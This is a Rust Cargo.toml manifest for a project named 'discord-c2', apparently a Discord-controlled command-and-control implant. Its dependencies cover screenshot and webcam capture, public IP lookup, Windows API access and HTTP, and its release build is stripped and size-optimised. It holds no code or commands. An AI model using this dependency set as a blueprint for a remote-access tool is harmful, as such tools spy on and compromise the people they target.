[package]
name = "discord-c2"
version = "0.0.1"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
anyhow = "1.0.70"
chrono = "0.4.24"
futures = "0.3.28"
image = "0.24.6"
jpeg-decoder = "0.3.0"
lazy_static = "1.4.0"
public-ip-addr = "0.1" # make my own for this
reqwest = "0.11.17"
regex = "1.8.1"
serde_json = "1.0.96"
screenshots = "0.5.4"
tempfile = "3.5.0"
tracing = "0.1.37"
tracing-subscriber = "0.3.17"
winapi = "0.3.9"
zip = "0.6.4"

[dependencies.nokhwa]
version = "0.10.3"
features = ["input-native", "output-threaded"]

[dependencies.serenity]
default-features = false
features = ["client", "gateway", "rustls_backend", "model", "cache"]
version = "0.11.5"

[dependencies.serde]
version = "1.0.163"
features = ["derive"]

[dependencies.tokio]
version = "1.28.1"
features = ["full"]

[dependencies.uuid]
version = "1.3.2"
features = ["v4"]

[profile.dev]
opt-level = 0
debug = true
lto = "off"
panic = "unwind"
incremental = true

[profile.release]
opt-level = "z"
debug = false
strip = "debuginfo"
debug-assertions = false
overflow-checks = false
lto = true
panic = "abort"
codegen-units = 1
